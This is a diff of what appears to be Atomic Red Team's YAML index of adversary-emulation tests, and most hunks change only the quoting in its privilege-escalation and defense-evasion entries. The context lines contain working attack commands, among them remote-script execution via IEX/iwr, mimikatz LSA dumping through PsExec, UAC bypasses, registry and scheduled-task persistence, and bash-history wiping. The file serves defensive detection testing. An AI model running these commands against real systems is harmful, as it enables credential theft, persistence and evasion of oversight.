@@ -15369,7 +15369,7 @@ privilege-escalation: auto_generated_guid: 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf description: 'Utilize LaunchDaemon to launch `Hello World` - ' +' supported_platforms: - macos input_arguments: @@ -15386,15 +15386,15 @@ privilege-escalation: - description: 'The shared library must exist on disk at specified location (#{path_malicious_plist}) - ' +' prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'echo "The plist file doesn''t exist. Check the path and try again."; exit 1; - ' +' executor: name: bash elevation_required: true @@ -15614,7 +15614,7 @@ privilege-escalation: auto_generated_guid: f047c7de-a2d9-406e-a62b-12a09d9516f4 description: 'Mac logon script - ' +' supported_platforms: - macos executor: @@ -15812,7 +15812,7 @@ privilege-escalation: description: 'Netsh interacts with other operating system components using dynamic-link library (DLL) files - ' +' supported_platforms: - windows input_arguments: @@ -15823,7 +15823,7 @@ privilege-escalation: executor: command: 'netsh.exe add helper #{helper_file} - ' +' name: command_prompt T1037.003: technique: @@ -15985,10 +15985,10 @@ privilege-escalation: dependencies: - description: 'DLL to inject must exist on disk at specified location (#{dll_path}) - ' +' prereq_command: 'if (Test-Path #{dll_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{dll_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1134.004/bin/calc.dll" -OutFile "#{dll_path}" @@ -16029,7 +16029,7 @@ privilege-escalation: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine ''#{command_line}'' -ParentId #{parent_pid}' 
@@ -16058,7 +16058,7 @@ privilege-escalation: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Start-ATHProcessUnderSpecificParent -ParentId #{parent_pid} -TestGuid #{test_guid}' @@ -16088,7 +16088,7 @@ privilege-escalation: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Get-CimInstance -ClassName Win32_Process -Property Name, CommandLine, ProcessId -Filter "Name = ''svchost.exe'' AND CommandLine LIKE ''%''" | @@ -16124,7 +16124,7 @@ privilege-escalation: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Start-Process -FilePath #{parent_name} -PassThru | Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine ''#{command_line}''' @@ -16534,7 +16534,7 @@ privilege-escalation: auto_generated_guid: 394a538e-09bb-4a4a-95d1-b93cf12682a8 description: 'Modify MacOS plist file in one of two directories - ' +' supported_platforms: - macos executor: @@ -16635,11 +16635,11 @@ privilege-escalation: command: 'reg add "hklm\system\currentcontrolset\control\print\monitors\ART" /v "Atomic Red Team" /d "#{monitor_dll}" /t REG_SZ - ' +' cleanup_command: 'reg delete "hklm\system\currentcontrolset\control\print\monitors\ART" /f >nul 2>&1 - ' +' name: command_prompt elevation_required: true T1055.002: @@ -16787,7 +16787,7 @@ privilege-escalation: profile pofile that points to a malicious executable. Upon execution, calc.exe will be launched. - ' +' supported_platforms: - windows input_arguments: @@ -16803,13 +16803,13 @@ privilege-escalation: dependencies: - description: 'Ensure a powershell profile exists for the current user - ' +' prereq_command: 'if (Test-Path #{ps_profile}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'New-Item -Path #{ps_profile} -Type File -Force - ' +' executor: command: | Add-Content #{ps_profile} -Value "" 
@@ -17156,13 +17156,13 @@ privilege-escalation: cleanup_command: 'Stop-Process -Name "#{spawnto_process_name}" -ErrorAction Ignore - ' +' name: powershell - name: RunPE via VBA auto_generated_guid: 3ad4a037-1598-4136-837c-4027e4fa319b description: 'This module executes notepad.exe from within the WINWORD.EXE process - ' +' supported_platforms: - windows input_arguments: @@ -17174,7 +17174,7 @@ privilege-escalation: dependencies: - description: 'Microsoft #{ms_product} must be installed - ' +' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -17185,7 +17185,7 @@ privilege-escalation: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" - ' +' executor: command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" @@ -17308,7 +17308,7 @@ privilege-escalation: dependencies: - description: 'The 64-bit version of Microsoft Office must be installed - ' +' prereq_command: | try { $wdApp = New-Object -COMObject "Word.Application" @@ -17319,7 +17319,7 @@ privilege-escalation: get_prereq_command: 'Write-Host "You will need to install Microsoft Word (64-bit) manually to meet this requirement" - ' +' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -17354,7 +17354,7 @@ privilege-escalation: - description: 'Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) - ' +' prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} if (Test-Path $mimikatz_path) {exit 0} else {exit 1} 
@@ -17369,10 +17369,10 @@ privilege-escalation: - description: 'PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_path}) - ' +' prereq_command: 'if (Test-Path "#{psexec_path}") { exit 0} else { exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" @@ -17383,7 +17383,7 @@ privilege-escalation: command: '#{psexec_path} /accepteula \\#{machine} -c #{mimikatz_path} "lsadump::lsa /inject /id:500" "exit" - ' +' name: command_prompt elevation_required: false T1055.008: @@ -17560,14 +17560,14 @@ privilege-escalation: command: 'sudo echo osascript -e ''tell app "Finder" to display dialog "Hello World"'' >> /etc/rc.common - ' +' elevation_required: true name: bash - name: rc.common auto_generated_guid: c33f3d80-5f04-419b-a13a-854d1cbdbf3a description: 'Modify rc.common - ' +' supported_platforms: - linux executor: @@ -17583,12 +17583,12 @@ privilege-escalation: ];then sudo rm /etc/rc.common;else sudo cp $origfilename /etc/rc.common && sudo rm $origfilename;fi - ' +' - name: rc.local auto_generated_guid: 126f71af-e1c9-405c-94ef-26a47b16c102 description: 'Modify rc.local - ' +' supported_platforms: - linux executor: @@ -17604,7 +17604,7 @@ privilege-escalation: ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local && sudo rm $origfilename;fi - ' +' T1547.007: technique: created: '2020-01-24T18:15:06.641Z' @@ -17686,10 +17686,10 @@ privilege-escalation: executor: command: 'sudo defaults write com.apple.loginwindow LoginHook #{script} - ' +' cleanup_command: 'sudo defaults delete com.apple.loginwindow LoginHook - ' +' elevation_required: true name: sh T1547.001: 
@@ -17815,11 +17815,11 @@ privilege-escalation: command: 'REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}" - ' +' cleanup_command: 'REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /f >nul 2>&1 - ' +' name: command_prompt - name: Reg Key RunOnce auto_generated_guid: 554cbd88-cde1-4b56-8168-0be552eed9eb @@ -17837,11 +17837,11 @@ privilege-escalation: command: 'REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "#{thing_to_execute}" - ' +' cleanup_command: 'REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: PowerShell Registry RunOnce @@ -17867,7 +17867,7 @@ privilege-escalation: cleanup_command: 'Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun" -Force -ErrorAction Ignore - ' +' name: powershell elevation_required: true - name: Suspicious vbs file run from startup Folder @@ -18108,7 +18108,7 @@ privilege-escalation: description: 'Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10. - ' +' supported_platforms: - windows input_arguments: @@ -18125,10 +18125,10 @@ privilege-escalation: elevation_required: false command: 'SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time} - ' +' cleanup_command: 'SCHTASKS /Delete /TN spawn /F >nul 2>&1 - ' +' - name: Scheduled task Remote auto_generated_guid: 2e5eac3e-327b-4a88-a0c0-c4057039a8dd description: | @@ -18164,11 +18164,11 @@ privilege-escalation: command: 'SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time} - ' +' cleanup_command: 'SCHTASKS /Delete /S #{target} /U #{user_name} /P #{password} /TN "Atomic task" /F >nul 2>&1 - ' +' - name: Powershell Cmdlet Scheduled Task auto_generated_guid: af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd description: | 
@@ -18190,7 +18190,7 @@ privilege-escalation: cleanup_command: 'Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false >$null 2>&1 - ' +' - name: Task Scheduler via VBA auto_generated_guid: ecd3fa21-7792-41a2-8726-2c5c673414d3 description: | @@ -18207,7 +18207,7 @@ privilege-escalation: dependencies: - description: 'Microsoft #{ms_product} must be installed - ' +' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -18218,7 +18218,7 @@ privilege-escalation: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" - ' +' executor: command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" @@ -18231,7 +18231,7 @@ privilege-escalation: login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing as Register-ScheduledTask cmdlet behind the scenes. - ' +' supported_platforms: - windows executor: @@ -18243,7 +18243,7 @@ privilege-escalation: cleanup_command: 'Unregister-ScheduledTask -TaskName "T1053_005_WMI" -confirm:$false >$null 2>&1 - ' +' T1053: technique: id: attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9 @@ -18379,7 +18379,7 @@ privilege-escalation: sets it as the screensaver so it will execute for persistence. Requires a reboot and logon. - ' +' supported_platforms: - windows input_arguments: @@ -18636,7 +18636,7 @@ privilege-escalation: description: 'Change Service registry ImagePath of a bengin service to a malicious file - ' +' supported_platforms: - windows input_arguments: 
@@ -18656,22 +18656,22 @@ privilege-escalation: dependencies: - description: 'The service must exist (#{weak_service_name}) - ' +' prereq_command: 'if (Get-Service #{weak_service_name}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'sc.exe create #{weak_service_name} binpath= "#{weak_service_path}" - ' +' executor: command: 'reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /f /v ImagePath /d "#{malicious_service_path}" - ' +' cleanup_command: 'sc.exe delete #{weak_service_name} - ' +' name: command_prompt T1548.001: technique: @@ -18727,7 +18727,7 @@ privilege-escalation: description: 'Make, change owner, and change file attributes on a C source code file - ' +' supported_platforms: - macos - linux @@ -18753,7 +18753,7 @@ privilege-escalation: auto_generated_guid: 759055b3-3885-4582-a8ec-c00c9d64dd79 description: 'This test sets the SetUID flag on a file in Linux and macOS. - ' +' supported_platforms: - macos - linux @@ -18769,14 +18769,14 @@ privilege-escalation: sudo chmod u+s #{file_to_setuid} cleanup_command: 'sudo rm #{file_to_setuid} - ' +' name: sh elevation_required: true - name: Set a SetGID flag on file auto_generated_guid: db55f666-7cba-46c6-9fe6-205a05c3242c description: 'This test sets the SetGID flag on a file in Linux and macOS. - ' +' supported_platforms: - macos - linux @@ -18792,7 +18792,7 @@ privilege-escalation: sudo chmod g+s #{file_to_setuid} cleanup_command: 'sudo rm #{file_to_setuid} - ' +' name: sh elevation_required: true - name: Make and modify capabilities of a binary @@ -18824,7 +18824,7 @@ privilege-escalation: description: 'This test gives a file the capability to set UID without using flags. - ' +' supported_platforms: - linux input_arguments: @@ -18838,7 +18838,7 @@ privilege-escalation: sudo setcap cap_setuid=ep #{file_to_setcap} cleanup_command: 'rm #{file_to_setcap} - ' +' name: sh elevation_required: true T1547.009: 
@@ -18912,7 +18912,7 @@ privilege-escalation: #{shortcut_file_path} cleanup_command: 'del -f #{shortcut_file_path} >nul 2>&1 - ' +' name: command_prompt - name: Create shortcut to cmd in startup folders auto_generated_guid: cfdc954d-4bb0-4027-875b-a1893ce406f2 @@ -19013,10 +19013,10 @@ privilege-escalation: executor: command: 'sudo touch /Library/StartupItems/EvilStartup.plist - ' +' cleanup_command: 'sudo rm /Library/StartupItems/EvilStartup.plist - ' +' name: sh elevation_required: true T1548.003: @@ -19084,7 +19084,7 @@ privilege-escalation: auto_generated_guid: 150c3a08-ee6e-48a6-aeaf-3659d24ceb4e description: 'Common Sudo enumeration methods. - ' +' supported_platforms: - macos - linux @@ -19098,7 +19098,7 @@ privilege-escalation: This is dangerous to modify without using ''visudo'', do not do this on a production system. - ' +' supported_platforms: - macos - linux @@ -19113,7 +19113,7 @@ privilege-escalation: description: 'Sets sudo caching tty_tickets value to disabled. This is dangerous to modify without using ''visudo'', do not do this on a production system. - ' +' supported_platforms: - macos - linux @@ -19219,7 +19219,7 @@ privilege-escalation: description: 'This test creates a Systemd service unit file and enables it as a service. - ' +' supported_platforms: - linux input_arguments: @@ -19292,15 +19292,15 @@ privilege-escalation: dependencies: - description: 'System must be Ubuntu ,Kali OR CentOS. - ' +' prereq_command: 'if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ] || [ $(cat /etc/os-release | grep -i ''ID="centos"'') ]; then exit /b 0; else exit /b 1; fi; - ' +' get_prereq_command: 'echo Please run from Ubuntu ,Kali OR CentOS. - ' +' executor: name: bash elevation_required: true 
@@ -19452,20 +19452,20 @@ privilege-escalation: dependencies: - description: 'Check if systemd-run exists on the machine - ' +' prereq_command: 'if [ -x "$(command -v systemd-run)" ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'echo "Install systemd on the machine."; exit 1; - ' +' executor: elevation_required: false command: 'systemd-run --user --unit=Atomic-Red-Team --on-calendar ''*:0/1'' /bin/sh -c ''echo "$(date) $(whoami)" >>/tmp/log'' - ' +' cleanup_command: | systemctl --user stop Atomic-Red-Team.service systemctl --user stop Atomic-Red-Team.timer @@ -19482,20 +19482,20 @@ privilege-escalation: dependencies: - description: 'Check if systemd-run exists on the machine - ' +' prereq_command: 'if [ -x "$(command -v systemd-run)" ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'echo "Install systemd on the machine."; exit 1; - ' +' executor: elevation_required: true command: 'systemd-run --unit=Atomic-Red-Team --on-calendar ''*:0/1'' /bin/sh -c ''echo "$(date) $(whoami)" >>/tmp/log'' - ' +' cleanup_command: | systemctl stop Atomic-Red-Team.service systemctl stop Atomic-Red-Team.timer @@ -19967,7 +19967,7 @@ privilege-escalation: auto_generated_guid: 94500ae1-7e31-47e3-886b-c328da46872f description: 'Adds a command to the .bash_profile file of the current user - ' +' supported_platforms: - macos - linux @@ -19979,13 +19979,13 @@ privilege-escalation: executor: command: 'echo "#{command_to_add}" >> ~/.bash_profile - ' +' name: sh - name: Add command to .bashrc auto_generated_guid: 0a898315-4cfa-4007-bafe-33a4646d115f description: 'Adds a command to the .bashrc file of the current user - ' +' supported_platforms: - macos - linux @@ -19997,7 +19997,7 @@ privilege-escalation: executor: command: 'echo "#{command_to_add}" >> ~/.bashrc - ' +' name: sh T1055.014: technique: 
@@ -20432,10 +20432,10 @@ privilege-escalation: dependencies: - description: 'Service binary must exist on disk at specified location (#{binary_path}) - ' +' prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}" @@ -20468,10 +20468,10 @@ privilege-escalation: dependencies: - description: 'Service binary must exist on disk at specified location (#{binary_path}) - ' +' prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}" @@ -20567,11 +20567,11 @@ privilege-escalation: command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, #{binary_to_execute}" -Force - ' +' cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Shell" -Force -ErrorAction Ignore - ' +' name: powershell - name: Winlogon Userinit Key Persistence - PowerShell auto_generated_guid: fb32c935-ee2e-454b-8fa3-1c46b42e8dfb @@ -20590,11 +20590,11 @@ privilege-escalation: command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, #{binary_to_execute}" -Force - ' +' cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Userinit" -Force -ErrorAction Ignore - ' +' name: powershell - name: Winlogon Notify Key Logon Persistence - PowerShell auto_generated_guid: d40da266-e073-4e5a-bb8b-2b385023e5f9 
@@ -20616,7 +20616,7 @@ privilege-escalation: cleanup_command: 'Remove-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force -ErrorAction Ignore - ' +' name: powershell T1547.013: technique: @@ -21110,10 +21110,10 @@ defense-evasion: command: 'bitsadmin.exe /transfer /Download /priority Foreground #{remote_file} #{local_file} - ' +' cleanup_command: 'del #{local_file} >nul 2>&1 - ' +' name: command_prompt - name: Bitsadmin Download (PowerShell) auto_generated_guid: f63b8bc4-07e5-4112-acba-56f646f3f0bc @@ -21137,10 +21137,10 @@ defense-evasion: command: 'Start-BitsTransfer -Priority foreground -Source #{remote_file} -Destination #{local_file} - ' +' cleanup_command: 'Remove-Item #{local_file} -ErrorAction Ignore - ' +' name: powershell - name: Persist, Download, & Execute auto_generated_guid: 62a06ec5-5754-47d2-bcfc-123d8314c6ae @@ -21178,7 +21178,7 @@ defense-evasion: bitsadmin.exe /complete #{bits_job_name} cleanup_command: 'del #{local_file} >nul 2>&1 - ' +' name: command_prompt - name: Bits download using desktopimgdownldr.exe (cmd) auto_generated_guid: afb5e09e-e385-4dee-9a94-6ee60979d114 @@ -21210,10 +21210,10 @@ defense-evasion: command: 'set "#{download_path}" && cmd /c desktopimgdownldr.exe /lockscreenurl:#{remote_file} /eventName:desktopimgdownldr - ' +' cleanup_command: 'del #{cleanup_path}\#{cleanup_file} >nul 2>&1 - ' +' name: command_prompt T1027.001: technique: @@ -21303,20 +21303,20 @@ defense-evasion: dependencies: - description: 'The binary must exist on disk at specified location (#{file_to_pad}) - ' +' prereq_command: 'if [ -f #{file_to_pad} ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'cp /bin/ls #{file_to_pad} - ' +' executor: command: 'dd if=/dev/zero bs=1 count=1 >> #{file_to_pad} - ' +' cleanup_command: 'rm #{file_to_pad} - ' +' name: sh T1542.003: technique: 
@@ -21549,7 +21549,7 @@ defense-evasion: cmd.exe /c eventvwr.msc cleanup_command: 'reg.exe delete hkcu\software\classes\mscfile /f >nul 2>&1 - ' +' name: command_prompt - name: Bypass UAC using Event Viewer (PowerShell) auto_generated_guid: a6ce9acf-842a-4af6-8f79-539be7608e2b @@ -21571,7 +21571,7 @@ defense-evasion: cleanup_command: 'Remove-Item "HKCU:\software\classes\mscfile" -force -Recurse -ErrorAction Ignore - ' +' name: powershell - name: Bypass UAC using Fodhelper auto_generated_guid: 58f641ea-12e3-499a-b684-44dee46bd182 @@ -21593,7 +21593,7 @@ defense-evasion: cleanup_command: 'reg.exe delete hkcu\software\classes\ms-settings /f >nul 2>&1 - ' +' name: command_prompt - name: Bypass UAC using Fodhelper - PowerShell auto_generated_guid: 3f627297-6c38-4e7d-a278-fc2563eaaeaa @@ -21616,7 +21616,7 @@ defense-evasion: cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ignore - ' +' name: powershell - name: Bypass UAC using ComputerDefaults (PowerShell) auto_generated_guid: 3c51abf2-44bf-42d8-9111-dc96ff66750f @@ -21639,7 +21639,7 @@ defense-evasion: cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ignore - ' +' name: powershell elevation_required: true - name: Bypass UAC by Mocking Trusted Directories @@ -21687,7 +21687,7 @@ defense-evasion: cleanup_command: 'Remove-Item -Path "HKCU:\Software\Classes\Folder" -Recurse -Force -ErrorAction Ignore - ' +' name: powershell - name: Disable UAC using reg.exe auto_generated_guid: 9e8af564-53ec-407e-aaa8-3cb20c3af7f9 @@ -21700,11 +21700,11 @@ defense-evasion: command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f - ' +' cleanup_command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f - ' +' name: command_prompt elevation_required: true - name: Bypass UAC using SilentCleanup task 
@@ -21751,7 +21751,7 @@ defense-evasion: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) - ' +' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -21762,7 +21762,7 @@ defense-evasion: executor: command: '"#{uacme_exe}" - ' +' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -21787,7 +21787,7 @@ defense-evasion: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) - ' +' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -21798,7 +21798,7 @@ defense-evasion: executor: command: '"#{uacme_exe}" - ' +' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -21822,7 +21822,7 @@ defense-evasion: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) - ' +' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -21833,7 +21833,7 @@ defense-evasion: executor: command: '"#{uacme_exe}" - ' +' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -21858,7 +21858,7 @@ defense-evasion: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) - ' +' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -21869,7 +21869,7 @@ defense-evasion: executor: command: '"#{uacme_exe}" - ' +' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore 
@@ -21893,7 +21893,7 @@ defense-evasion: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) - ' +' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -21904,7 +21904,7 @@ defense-evasion: executor: command: '"#{uacme_exe}" - ' +' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -21928,7 +21928,7 @@ defense-evasion: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) - ' +' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -21939,7 +21939,7 @@ defense-evasion: executor: command: '"#{uacme_exe}" - ' +' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -21964,7 +21964,7 @@ defense-evasion: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) - ' +' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -21975,7 +21975,7 @@ defense-evasion: executor: command: '"#{uacme_exe}" - ' +' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -22000,7 +22000,7 @@ defense-evasion: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) - ' +' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -22011,7 +22011,7 @@ defense-evasion: executor: command: '"#{uacme_exe}" - ' +' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore 
@@ -22093,7 +22093,7 @@ defense-evasion: description: 'Adversaries may supply CMSTP.exe with INF files infected with malicious commands - ' +' supported_platforms: - windows input_arguments: @@ -22105,24 +22105,24 @@ defense-evasion: dependencies: - description: 'INF file must exist on disk at specified location (#{inf_file_path}) - ' +' prereq_command: 'if (Test-Path #{inf_file_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{inf_file_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.003/src/T218.003.inf" -OutFile "#{inf_file_path}" executor: command: 'cmstp.exe /s #{inf_file_path} - ' +' name: command_prompt - name: CMSTP Executing UAC Bypass auto_generated_guid: 748cb4f6-2fb3-4e97-b7ad-b22635a09ab0 description: 'Adversaries may invoke cmd.exe (or other malicious commands) by embedding them in the RunPreSetupCommandsSection of an INF file - ' +' supported_platforms: - windows input_arguments: @@ -22134,17 +22134,17 @@ defense-evasion: dependencies: - description: 'INF file must exist on disk at specified location (#{inf_file_uac}) - ' +' prereq_command: 'if (Test-Path #{inf_file_uac}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{inf_file_uac}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.003/src/T1218.003_uacbypass.inf" -OutFile "#{inf_file_uac}" executor: command: 'cmstp.exe /s #{inf_file_uac} /au - ' +' name: command_prompt T1574.012: technique: 
@@ -22255,7 +22255,7 @@ defense-evasion: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" @@ -22300,7 +22300,7 @@ defense-evasion: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" @@ -22338,7 +22338,7 @@ defense-evasion: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" 
@@ -22422,71 +22422,71 @@ defense-evasion: auto_generated_guid: a934276e-2be5-4a36-93fd-98adbb5bd4fc description: 'Clears bash history via rm - ' +' supported_platforms: - linux - macos executor: command: 'rm ~/.bash_history - ' +' name: sh - name: Clear Bash history (echo) auto_generated_guid: cbf506a5-dd78-43e5-be7e-a46b7c7a0a11 description: 'Clears bash history via rm - ' +' supported_platforms: - linux executor: command: 'echo "" > ~/.bash_history - ' +' name: sh - name: Clear Bash history (cat dev/null) auto_generated_guid: b1251c35-dcd3-4ea1-86da-36d27b54f31f description: 'Clears bash history via cat /dev/null - ' +' supported_platforms: - linux - macos executor: command: 'cat /dev/null > ~/.bash_history - ' +' name: sh - name: Clear Bash history (ln dev/null) auto_generated_guid: 23d348f3-cc5c-4ba9-bd0a-ae09069f0914 description: 'Clears bash history via a symlink to /dev/null - ' +' supported_platforms: - linux - macos executor: command: 'ln -sf /dev/null ~/.bash_history - ' +' name: sh - name: Clear Bash history (truncate) auto_generated_guid: 47966a1d-df4f-4078-af65-db6d9aa20739 description: 'Clears bash history via truncate - ' +' supported_platforms: - linux executor: command: 'truncate -s0 ~/.bash_history - ' +' name: sh - name: Clear history of a bunch of shells auto_generated_guid: 7e6721df-5f08-4370-9255-f06d8a77af4c description: 'Clears the history of a bunch of different shell types by setting the history size to zero - ' +' supported_platforms: - linux - macos @@ -22501,7 +22501,7 @@ defense-evasion: description: 'Clears the history and disable bash history logging of the current shell and future shell sessions - ' +' supported_platforms: - linux - macos @@ -22521,7 +22521,7 @@ defense-evasion: description: 'Using a space before a command causes the command to not be logged in the Bash History file - ' +' 